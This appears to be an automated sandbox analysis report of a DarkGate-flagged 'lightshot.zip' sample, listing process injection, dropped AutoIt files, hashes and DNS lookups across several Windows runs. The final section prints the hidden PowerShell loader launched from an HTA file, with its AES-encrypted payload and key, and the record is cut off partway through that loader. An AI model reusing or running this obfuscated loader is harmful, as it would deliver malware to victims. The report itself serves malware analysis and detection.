Analysis Overview
SHA256
109aac8fd1994e580398ee91fce9a9e1ef39873566e601106ce2ad6be29e06a6
Threat Level: Known bad
The file lightshot.zip was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
DarkGate
Blocklisted process makes network request
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Loads dropped DLL
Executes dropped EXE
Enumerates physical storage devices
Unsigned PE
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-01 18:16
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-01 18:16
Reported
2023-12-01 18:19
Platform
win7-20231023-en
Max time kernel
120s
Max time network
18s
Command Line
Signatures
DarkGate
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1448 created 1076 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\taskhost.exe |
| PID 1448 created 1076 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\taskhost.exe |
| PID 1448 created 1156 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\Dwm.exe |
| PID 1448 created 1076 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\taskhost.exe |
| PID 1448 created 1076 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\taskhost.exe |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | \??\c:\tmpp\Autoit3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | \??\c:\tmpp\Autoit3.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Lightshot.dll,#1
C:\Windows\system32\taskhost.exe
"taskhost.exe"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Lightshot.dll,#1
\??\c:\tmpp\Autoit3.exe
c:\tmpp\Autoit3.exe c:\tmpp\test.au3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | trans1ategooglecom.com | udp |
Files
memory/2872-0-0x00000000008E0000-0x0000000000BA2000-memory.dmp
\tmpp\Autoit3.exe
| MD5 | cb7ec6c3e69865e46e49a684146e6564 |
| SHA1 | a0e464b16936f21bbd9100b9f46a52a10cd2d3e7 |
| SHA256 | 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343 |
| SHA512 | 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0 |
C:\tmpp\Autoit3.exe
| MD5 | cb7ec6c3e69865e46e49a684146e6564 |
| SHA1 | a0e464b16936f21bbd9100b9f46a52a10cd2d3e7 |
| SHA256 | 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343 |
| SHA512 | 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0 |
\??\c:\tmpp\test.au3
| MD5 | dbd1ca08a1b009d1abab3def6ffa967b |
| SHA1 | f05c604a879c9396f93f6857f84d6ba58734ae0f |
| SHA256 | 1744c6621eeb65626f1d0c99ffcb11b61d61e1f1747e4e8310e3e0d921056bb1 |
| SHA512 | 6b28d83aee4eb2b219ed4e665f09bda8d32250b6b2d2a74b2f56243ce60b1a49aa570050b752bcbc27c4deff373d0ca8a6d968714813223648ec58c0a0f7d2cb |
memory/2872-7-0x00000000008E0000-0x0000000000BA2000-memory.dmp
memory/1448-11-0x0000000000A30000-0x0000000000E30000-memory.dmp
memory/1448-12-0x0000000002DF0000-0x0000000002F85000-memory.dmp
\??\c:\tmpp\AutoIt3.exe
| MD5 | cb7ec6c3e69865e46e49a684146e6564 |
| SHA1 | a0e464b16936f21bbd9100b9f46a52a10cd2d3e7 |
| SHA256 | 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343 |
| SHA512 | 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0 |
memory/1448-18-0x0000000002DF0000-0x0000000002F85000-memory.dmp
memory/1448-19-0x0000000002DF0000-0x0000000002F85000-memory.dmp
memory/1448-20-0x0000000002DF0000-0x0000000002F85000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-01 18:16
Reported
2023-12-01 18:19
Platform
win10v2004-20231127-en
Max time kernel
92s
Max time network
123s
Command Line
Signatures
DarkGate
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2464 created 3840 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\backgroundTaskHost.exe |
| PID 2464 created 2840 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\taskhostw.exe |
| PID 2464 created 3952 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe |
| PID 2464 created 3860 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\System32\RuntimeBroker.exe |
| PID 2464 created 3860 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\System32\RuntimeBroker.exe |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | \??\c:\tmpp\Autoit3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | \??\c:\tmpp\Autoit3.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4304 wrote to memory of 552 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4304 wrote to memory of 552 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4304 wrote to memory of 552 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 552 wrote to memory of 2464 | N/A | C:\Windows\SysWOW64\rundll32.exe | \??\c:\tmpp\Autoit3.exe |
| PID 552 wrote to memory of 2464 | N/A | C:\Windows\SysWOW64\rundll32.exe | \??\c:\tmpp\Autoit3.exe |
| PID 552 wrote to memory of 2464 | N/A | C:\Windows\SysWOW64\rundll32.exe | \??\c:\tmpp\Autoit3.exe |
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX53ypgrj20bgndg05hj3tc7z654myszwp.mca
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Lightshot.dll,#1
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Lightshot.dll,#1
\??\c:\tmpp\Autoit3.exe
c:\tmpp\Autoit3.exe c:\tmpp\test.au3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.78.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.240.110.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.78.101.95.in-addr.arpa | udp |
Files
C:\tmpp\Autoit3.exe
| MD5 | cb7ec6c3e69865e46e49a684146e6564 |
| SHA1 | a0e464b16936f21bbd9100b9f46a52a10cd2d3e7 |
| SHA256 | 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343 |
| SHA512 | 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0 |
memory/552-4-0x0000000000400000-0x00000000006C2000-memory.dmp
\??\c:\tmpp\test.au3
| MD5 | dbd1ca08a1b009d1abab3def6ffa967b |
| SHA1 | f05c604a879c9396f93f6857f84d6ba58734ae0f |
| SHA256 | 1744c6621eeb65626f1d0c99ffcb11b61d61e1f1747e4e8310e3e0d921056bb1 |
| SHA512 | 6b28d83aee4eb2b219ed4e665f09bda8d32250b6b2d2a74b2f56243ce60b1a49aa570050b752bcbc27c4deff373d0ca8a6d968714813223648ec58c0a0f7d2cb |
memory/2464-7-0x0000000001510000-0x0000000001910000-memory.dmp
memory/2464-9-0x0000000004660000-0x00000000047F5000-memory.dmp
\??\c:\tmpp\AutoIt3.exe
| MD5 | cb7ec6c3e69865e46e49a684146e6564 |
| SHA1 | a0e464b16936f21bbd9100b9f46a52a10cd2d3e7 |
| SHA256 | 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343 |
| SHA512 | 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0 |
memory/2464-15-0x0000000004660000-0x00000000047F5000-memory.dmp
memory/2464-16-0x0000000004660000-0x00000000047F5000-memory.dmp
memory/2464-18-0x0000000004660000-0x00000000047F5000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2023-12-01 18:16
Reported
2023-12-01 18:19
Platform
win7-20231023-en
Max time kernel
118s
Max time network
132s
Command Line
Signatures
DarkGate
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1120 created 1260 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\taskhost.exe |
| PID 1120 created 1380 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\Dwm.exe |
| PID 1120 created 1260 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\taskhost.exe |
| PID 1120 created 1380 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\Dwm.exe |
| PID 1120 created 1260 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\taskhost.exe |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Lightshot.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | \??\c:\tmpp\Autoit3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | \??\c:\tmpp\Autoit3.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1940 wrote to memory of 1120 | N/A | C:\Users\Admin\AppData\Local\Temp\Lightshot.exe | \??\c:\tmpp\Autoit3.exe |
| PID 1940 wrote to memory of 1120 | N/A | C:\Users\Admin\AppData\Local\Temp\Lightshot.exe | \??\c:\tmpp\Autoit3.exe |
| PID 1940 wrote to memory of 1120 | N/A | C:\Users\Admin\AppData\Local\Temp\Lightshot.exe | \??\c:\tmpp\Autoit3.exe |
| PID 1940 wrote to memory of 1120 | N/A | C:\Users\Admin\AppData\Local\Temp\Lightshot.exe | \??\c:\tmpp\Autoit3.exe |
Processes
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
C:\Windows\system32\taskhost.exe
"taskhost.exe"
C:\Users\Admin\AppData\Local\Temp\Lightshot.exe
"C:\Users\Admin\AppData\Local\Temp\Lightshot.exe"
\??\c:\tmpp\Autoit3.exe
c:\tmpp\Autoit3.exe c:\tmpp\test.au3
Network
Files
memory/1940-0-0x0000000002480000-0x0000000002742000-memory.dmp
\tmpp\Autoit3.exe
| MD5 | cb7ec6c3e69865e46e49a684146e6564 |
| SHA1 | a0e464b16936f21bbd9100b9f46a52a10cd2d3e7 |
| SHA256 | 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343 |
| SHA512 | 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0 |
memory/1940-7-0x0000000002480000-0x0000000002742000-memory.dmp
C:\tmpp\Autoit3.exe
| MD5 | cb7ec6c3e69865e46e49a684146e6564 |
| SHA1 | a0e464b16936f21bbd9100b9f46a52a10cd2d3e7 |
| SHA256 | 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343 |
| SHA512 | 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0 |
\??\c:\tmpp\test.au3
| MD5 | dbd1ca08a1b009d1abab3def6ffa967b |
| SHA1 | f05c604a879c9396f93f6857f84d6ba58734ae0f |
| SHA256 | 1744c6621eeb65626f1d0c99ffcb11b61d61e1f1747e4e8310e3e0d921056bb1 |
| SHA512 | 6b28d83aee4eb2b219ed4e665f09bda8d32250b6b2d2a74b2f56243ce60b1a49aa570050b752bcbc27c4deff373d0ca8a6d968714813223648ec58c0a0f7d2cb |
memory/1120-11-0x0000000000730000-0x0000000000B30000-memory.dmp
memory/1120-12-0x0000000002F00000-0x0000000003095000-memory.dmp
\??\c:\tmpp\AutoIt3.exe
| MD5 | cb7ec6c3e69865e46e49a684146e6564 |
| SHA1 | a0e464b16936f21bbd9100b9f46a52a10cd2d3e7 |
| SHA256 | 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343 |
| SHA512 | 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0 |
memory/1120-18-0x0000000002F00000-0x0000000003095000-memory.dmp
memory/1120-19-0x0000000002F00000-0x0000000003095000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2023-12-01 18:16
Reported
2023-12-01 18:19
Platform
win10v2004-20231127-en
Max time kernel
87s
Max time network
119s
Command Line
Signatures
DarkGate
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1660 created 2448 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\sihost.exe |
| PID 1660 created 4828 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe |
| PID 1660 created 2800 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\system32\taskhostw.exe |
| PID 1660 created 3960 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe |
| PID 1660 created 3804 | N/A | \??\c:\tmpp\Autoit3.exe | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | \??\c:\tmpp\Autoit3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | \??\c:\tmpp\Autoit3.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\tmpp\Autoit3.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3812 wrote to memory of 1660 | N/A | C:\Users\Admin\AppData\Local\Temp\Lightshot.exe | \??\c:\tmpp\Autoit3.exe |
| PID 3812 wrote to memory of 1660 | N/A | C:\Users\Admin\AppData\Local\Temp\Lightshot.exe | \??\c:\tmpp\Autoit3.exe |
| PID 3812 wrote to memory of 1660 | N/A | C:\Users\Admin\AppData\Local\Temp\Lightshot.exe | \??\c:\tmpp\Autoit3.exe |
Processes
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\sihost.exe
sihost.exe
C:\Users\Admin\AppData\Local\Temp\Lightshot.exe
"C:\Users\Admin\AppData\Local\Temp\Lightshot.exe"
\??\c:\tmpp\Autoit3.exe
c:\tmpp\Autoit3.exe c:\tmpp\test.au3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.78.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.240.110.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.78.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
memory/3812-0-0x0000000003360000-0x0000000003622000-memory.dmp
C:\tmpp\Autoit3.exe
| MD5 | cb7ec6c3e69865e46e49a684146e6564 |
| SHA1 | a0e464b16936f21bbd9100b9f46a52a10cd2d3e7 |
| SHA256 | 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343 |
| SHA512 | 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0 |
memory/3812-5-0x0000000003360000-0x0000000003622000-memory.dmp
\??\c:\tmpp\test.au3
| MD5 | dbd1ca08a1b009d1abab3def6ffa967b |
| SHA1 | f05c604a879c9396f93f6857f84d6ba58734ae0f |
| SHA256 | 1744c6621eeb65626f1d0c99ffcb11b61d61e1f1747e4e8310e3e0d921056bb1 |
| SHA512 | 6b28d83aee4eb2b219ed4e665f09bda8d32250b6b2d2a74b2f56243ce60b1a49aa570050b752bcbc27c4deff373d0ca8a6d968714813223648ec58c0a0f7d2cb |
memory/1660-9-0x00000000016D0000-0x0000000001AD0000-memory.dmp
memory/1660-10-0x0000000004920000-0x0000000004AB5000-memory.dmp
\??\c:\tmpp\AutoIt3.exe
| MD5 | cb7ec6c3e69865e46e49a684146e6564 |
| SHA1 | a0e464b16936f21bbd9100b9f46a52a10cd2d3e7 |
| SHA256 | 64bc6210dec442292df50dd58b8f7aaa6fcd49931cbb90609f439b86c527d343 |
| SHA512 | 61fe7fa083f82a207c6a464d0b946d97f050c7cea9ee944e56ff7f5ad87e6ff638052d4809aea9fe01591d5346d19f2b7231c36ca94d61778edb15d89efc16b0 |
memory/1660-17-0x0000000004920000-0x0000000004AB5000-memory.dmp
memory/1660-16-0x0000000004920000-0x0000000004AB5000-memory.dmp
memory/1660-19-0x0000000004920000-0x0000000004AB5000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2023-12-01 18:16
Reported
2023-12-01 18:19
Platform
win7-20231020-en
Max time kernel
118s
Max time network
121s
Command Line
Signatures
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2084844033-2744876406-2053742436-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\lightshot.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $bjKJNucK = 'AAAAAAAAAAAAAAAAAAAAAP6K+v/ILIzonFqWY3aMyfu65Aitbvrdlf1JTR+VHM/93Pf7W9XSL9oKmFg9V+qy7eBG0S0HcDJtKhMRJ3Q9l7qhshHWmSGG8dKhKozh29fz02LJqF75p00XN+M8aChOLhiqviflbGu7cJqrbrWEVM7I+svNVeMHi6RuXQg3kyji0gso+E8HnnYMnLf63ehVx7vxZM1uNnQOjwScVjqGSm+URXGtIivHGvS7vky4GJZoZsxf9RpCqeVgXa+3SYd3lT+/+i5jaP4JR3SIEZQkfN4AsMHwqS+l2uMmKP4+eY38Xpo7CromP9x0lgF9/+BppwkdSfBvKvcCwokBDbD9QX0rmGMo+aov1Pa6JMsUJndxd7gXYZ4NJgIxfsx3nG11k/xyeA3FKb9M5uN34DguAT8bLbYW0/uunjQ7jci7sDSqFGwM7cVHsu4uQ/vxCWA/VsIKoOpCnJsqL9e7yfTQZd8ZledgaTqPAiksHr6qeF2DrDm6GXq3tlt+swecebAo1zXCmXTtzABYsfOV3gKMT2wGmUa7+uZhQ2P27JDH936ZqiCjJhqDl0xxeHPOL0kSdCguQBfNCliXAOw0QT2did2+iIqeoIjfoocDqNEJhNhCCzeCOn2vP07dnK9t/mvilfzeTZnmj743sAV12jWIOTHgc/e4Q4N2+Rx9yp2vT1yz5c5HnhSztHp9gvRm0I/7U5UzD0KwVsJgs0usZMkANdJIBC+a5JNnLOv+mAQAufTMUMZULnuHz/rBoZTqw37f7chwuwDV6ZxoGqp2MbPqCgeFKQgIefOApO7TTNXN6yMHo0mWEKwTL7MKX2H8CjHqVMbhmQkkJkL+2XytOm7uFf2JB2OB+vcXheFaViJYbxyQz/VZC7uSNX21qrWcvFBOqJDTAQDXy6Uyj6yKKEYT0Hj5nHpOf6eaKo10Yx4GqfU1';$NNTHozEK = 'Skp6VVRhbXN6SUxLdUZqdEhQeFhCWERYS0NVd0hOWlI=';$qxBNht = New-Object 'System.Security.Cryptography.AesManaged';$qxBNht.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qxBNht.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qxBNht.BlockSize = 128;$qxBNht.KeySize = 256;$qxBNht.Key = [System.Convert]::FromBase64String($NNTHozEK);$SRSPF = [System.Convert]::FromBase64String($bjKJNucK);$kBpEazov = $SRSPF[0..15];$qxBNht.IV = $kBpEazov;$wZxllfVVN = $qxBNht.CreateDecryptor();$OPUtZnWeo = $wZxllfVVN.TransformFinalBlock($SRSPF, 16, 